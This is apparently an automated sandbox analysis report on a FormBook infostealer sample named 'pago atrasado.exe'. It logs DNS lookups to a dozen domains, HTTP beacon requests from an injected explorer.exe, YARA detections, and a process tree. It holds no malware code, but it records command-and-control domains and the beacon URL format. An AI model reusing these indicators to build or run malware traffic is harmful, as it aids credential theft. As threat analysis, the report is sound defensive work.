                                          Oct 13, 2021 16:44:46.664763927 CEST804979374.208.236.134192.168.2.5
                                          Oct 13, 2021 16:44:46.665534973 CEST4979380192.168.2.574.208.236.134
                                          Oct 13, 2021 16:44:46.665771008 CEST4979380192.168.2.574.208.236.134
                                          Oct 13, 2021 16:44:46.814018011 CEST804979374.208.236.134192.168.2.5
                                          Oct 13, 2021 16:45:02.291773081 CEST4979780192.168.2.53.64.163.50
                                          Oct 13, 2021 16:45:02.310440063 CEST80497973.64.163.50192.168.2.5
                                          Oct 13, 2021 16:45:02.310652018 CEST4979780192.168.2.53.64.163.50
                                          Oct 13, 2021 16:45:02.310893059 CEST4979780192.168.2.53.64.163.50
                                          Oct 13, 2021 16:45:02.328926086 CEST80497973.64.163.50192.168.2.5
                                          Oct 13, 2021 16:45:02.328963041 CEST80497973.64.163.50192.168.2.5
                                          Oct 13, 2021 16:45:02.328974009 CEST80497973.64.163.50192.168.2.5
                                          Oct 13, 2021 16:45:02.329202890 CEST4979780192.168.2.53.64.163.50
                                          Oct 13, 2021 16:45:02.329302073 CEST4979780192.168.2.53.64.163.50
                                          Oct 13, 2021 16:45:02.348476887 CEST80497973.64.163.50192.168.2.5

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 13, 2021 16:44:14.384646893 CEST5244153192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:14.506238937 CEST53524418.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:20.181121111 CEST6217653192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:20.211018085 CEST53621768.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:25.232558966 CEST5959653192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:25.272434950 CEST53595968.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:30.433674097 CEST6529653192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:30.844825983 CEST53652968.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:35.857575893 CEST6318353192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:36.038960934 CEST53631838.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:41.058072090 CEST6015153192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:41.082652092 CEST53601518.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:46.351602077 CEST5516153192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:46.370044947 CEST53551618.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:51.682477951 CEST4999253192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:52.131743908 CEST53499928.8.8.8192.168.2.5
                                          Oct 13, 2021 16:44:57.200576067 CEST6007553192.168.2.58.8.8.8
                                          Oct 13, 2021 16:44:57.224594116 CEST53600758.8.8.8192.168.2.5
                                          Oct 13, 2021 16:45:02.261354923 CEST5501653192.168.2.58.8.8.8
                                          Oct 13, 2021 16:45:02.290517092 CEST53550168.8.8.8192.168.2.5
                                          Oct 13, 2021 16:45:07.338278055 CEST6434553192.168.2.58.8.8.8
                                          Oct 13, 2021 16:45:07.366216898 CEST53643458.8.8.8192.168.2.5
                                          Oct 13, 2021 16:45:12.463208914 CEST5712853192.168.2.58.8.8.8
                                          Oct 13, 2021 16:45:12.486450911 CEST53571288.8.8.8192.168.2.5

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Oct 13, 2021 16:44:14.384646893 CEST192.168.2.58.8.8.80xfa8aStandard query (0)www.highvizpeople.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:20.181121111 CEST192.168.2.58.8.8.80xa615Standard query (0)www.ttemola.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:25.232558966 CEST192.168.2.58.8.8.80x4912Standard query (0)www.oddanimalsink.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:30.433674097 CEST192.168.2.58.8.8.80x7083Standard query (0)www.umgaleloacademy.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:35.857575893 CEST192.168.2.58.8.8.80xafc8Standard query (0)www.baybeg.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:41.058072090 CEST192.168.2.58.8.8.80x9ad1Standard query (0)www.itskosi.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:46.351602077 CEST192.168.2.58.8.8.80xf190Standard query (0)www.crisisinterventionadvocates.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:51.682477951 CEST192.168.2.58.8.8.80x43b1Standard query (0)www.ishhs.xyzA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:57.200576067 CEST192.168.2.58.8.8.80xb3d4Standard query (0)www.sfcn-dng.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:45:02.261354923 CEST192.168.2.58.8.8.80x428Standard query (0)www.everythangbutwhite.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:45:07.338278055 CEST192.168.2.58.8.8.80xc6a6Standard query (0)www.shopthatlookboutique.comA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:45:12.463208914 CEST192.168.2.58.8.8.80x3df5Standard query (0)www.christinegagnonjewellery.comA (IP address)IN (0x0001)

                                          DNS Answers

                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                          Oct 13, 2021 16:44:14.506238937 CEST8.8.8.8192.168.2.50xfa8aNo error (0)www.highvizpeople.com208.91.197.27A (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:20.211018085 CEST8.8.8.8192.168.2.50xa615Name error (3)www.ttemola.comnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:25.272434950 CEST8.8.8.8192.168.2.50x4912No error (0)www.oddanimalsink.comoddanimalsink.comCNAME (Canonical name)IN (0x0001)
                                          Oct 13, 2021 16:44:25.272434950 CEST8.8.8.8192.168.2.50x4912No error (0)oddanimalsink.com34.102.136.180A (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:30.844825983 CEST8.8.8.8192.168.2.50x7083Server failure (2)www.umgaleloacademy.comnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:41.082652092 CEST8.8.8.8192.168.2.50x9ad1No error (0)www.itskosi.com46.101.121.244A (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:41.082652092 CEST8.8.8.8192.168.2.50x9ad1No error (0)www.itskosi.com206.189.50.215A (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:46.370044947 CEST8.8.8.8192.168.2.50xf190No error (0)www.crisisinterventionadvocates.com74.208.236.134A (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:52.131743908 CEST8.8.8.8192.168.2.50x43b1Name error (3)www.ishhs.xyznonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:44:57.224594116 CEST8.8.8.8192.168.2.50xb3d4Name error (3)www.sfcn-dng.comnonenoneA (IP address)IN (0x0001)
                                          Oct 13, 2021 16:45:02.290517092 CEST8.8.8.8192.168.2.50x428No error (0)www.everythangbutwhite.com3.64.163.50A (IP address)IN (0x0001)
                                          Oct 13, 2021 16:45:07.366216898 CEST8.8.8.8192.168.2.50xc6a6No error (0)www.shopthatlookboutique.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                          Oct 13, 2021 16:45:07.366216898 CEST8.8.8.8192.168.2.50xc6a6No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                          Oct 13, 2021 16:45:12.486450911 CEST8.8.8.8192.168.2.50x3df5Name error (3)www.christinegagnonjewellery.comnonenoneA (IP address)IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.highvizpeople.com
                                          • www.oddanimalsink.com
                                          • www.itskosi.com
                                          • www.crisisinterventionadvocates.com
                                          • www.everythangbutwhite.com

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          0192.168.2.549787208.91.197.2780C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 13, 2021 16:44:14.661981106 CEST4115OUTGET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.highvizpeople.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:44:14.906196117 CEST4117INHTTP/1.1 200 OK
                                          Date: Wed, 13 Oct 2021 14:44:14 GMT
                                          Server: Apache
                                          Set-Cookie: vsid=919vr3816818547928602; expires=Mon, 12-Oct-2026 14:44:14 GMT; Max-Age=157680000; path=/; domain=www.highvizpeople.com; HttpOnly
                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KQL0Qewm/57A7d4wt4OHK1+3N7YmuFf9rlEyC7xrWthCcsfi2zFqQt+3/QwUNakTWu2Rc2ZBUwg9yn9iy5bcVQ==
                                          Keep-Alive: timeout=5, max=102
                                          Connection: Keep-Alive
                                          Transfer-Encoding: chunked
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 34 65 36 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 4b 51 4c 30 51 65 77 6d 2f 35 37 41 37 64 34 77 74 34 4f 48 4b 31 2b 33 4e 37 59 6d 75 46 66 39 72 6c 45 79 43 37 78 72 57 74 68 43 63 73 66 69 32 7a 46 71 51 74 2b 33 2f 51 77 55 4e 61 6b 54 57 75 32 52 63 32 5a 42 55 77 67 39 79 6e 39 69 79 35 62 63 56 51 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 69 67 68 76 69 7a 70 65 6f 70 6c 65 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 68 69 67 68 76 69 7a 70 65 6f 70 6c 65 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d
                                          Data Ascii: 4e65<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KQL0Qewm/57A7d4wt4OHK1+3N7YmuFf9rlEyC7xrWthCcsfi2zFqQt+3/QwUNakTWu2Rc2ZBUwg9yn9iy5bcVQ=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.highvizpeople.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.highvizpeople.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";im


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          1192.168.2.54979034.102.136.18080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 13, 2021 16:44:25.292716026 CEST5623OUTGET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.oddanimalsink.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:44:25.406374931 CEST5623INHTTP/1.1 403 Forbidden
                                          Server: openresty
                                          Date: Wed, 13 Oct 2021 14:44:25 GMT
                                          Content-Type: text/html
                                          Content-Length: 275
                                          ETag: "615f9601-113"
                                          Via: 1.1 google
                                          Connection: close
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          2192.168.2.54979146.101.121.24480C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 13, 2021 16:44:41.115659952 CEST5625OUTGET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.itskosi.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:44:41.303195953 CEST5625INHTTP/1.1 301 Moved Permanently
                                          cache-control: public, max-age=0, must-revalidate
                                          content-length: 45
                                          content-type: text/plain
                                          date: Wed, 13 Oct 2021 14:44:41 GMT
                                          age: 0
                                          location: https://www.itskosi.com/u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo
                                          x-nf-request-id: 01FHX1SM1KDY80SN7YV2CH4TJD
                                          server: Netlify
                                          Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 74 73 6b 6f 73 69 2e 63 6f 6d 2f 75 39 78 6e 2f 0a
                                          Data Ascii: Redirecting to https://www.itskosi.com/u9xn/


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          3192.168.2.54979374.208.236.13480C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 13, 2021 16:44:46.515561104 CEST5635OUTGET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.crisisinterventionadvocates.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:44:46.664726973 CEST5635INHTTP/1.1 404 Not Found
                                          Content-Type: text/html
                                          Content-Length: 626
                                          Connection: close
                                          Date: Wed, 13 Oct 2021 14:44:46 GMT
                                          Server: Apache
                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                          Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          4192.168.2.5497973.64.163.5080C:\Windows\explorer.exe
                                          TimestampkBytes transferredDirectionData
                                          Oct 13, 2021 16:45:02.310893059 CEST5649OUTGET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1
                                          Host: www.everythangbutwhite.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                          Oct 13, 2021 16:45:02.328963041 CEST5650INHTTP/1.1 410 Gone
                                          Server: openresty
                                          Date: Wed, 13 Oct 2021 14:45:02 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 36 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 65 76 65 72 79 74 68 61 6e 67 62 75 74 77 68 69 74 65 2e 63 6f 6d 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 34 32 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 65 76 65 72 79 74 68 61 6e 67 62 75 74 77 68 69 74 65 2e 63 6f 6d 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 7<html>9 <head>56 <meta http-equiv='refresh' content='5; url=http://www.everythangbutwhite.com/' />a </head>9 <body>42 You are being redirected to http://www.everythangbutwhite.coma </body>8</html>0


                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          Analysis Process: pago atrasado.exe PID: 4308 Parent PID: 6040

                                          General

                                          Start time:16:42:56
                                          Start date:13/10/2021
                                          Path:C:\Users\user\Desktop\pago atrasado.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\pago atrasado.exe'
                                          Imagebase:0x400000
                                          File size:288183 bytes
                                          MD5 hash:F841C72B1C4CADC4C98903AD26A96A16
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Analysis Process: pago atrasado.exe PID: 2840 Parent PID: 4308

                                          General

                                          Start time:16:42:58
                                          Start date:13/10/2021
                                          Path:C:\Users\user\Desktop\pago atrasado.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\pago atrasado.exe'
                                          Imagebase:0x400000
                                          File size:288183 bytes
                                          MD5 hash:F841C72B1C4CADC4C98903AD26A96A16
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          Analysis Process: explorer.exe PID: 3472 Parent PID: 2840

                                          General

                                          Start time:16:43:02
                                          Start date:13/10/2021
                                          Path:C:\Windows\explorer.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\Explorer.EXE
                                          Imagebase:0x7ff693d90000
                                          File size:3933184 bytes
                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:high

                                          Analysis Process: colorcpl.exe PID: 248 Parent PID: 3472

                                          General

                                          Start time:16:43:34
                                          Start date:13/10/2021
                                          Path:C:\Windows\SysWOW64\colorcpl.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\colorcpl.exe
                                          Imagebase:0xe0000
                                          File size:86528 bytes
                                          MD5 hash:746F3B5E7652EA0766BA10414D317981
                                          Has elevated privileges:true
                                          Has administrator privileges:true
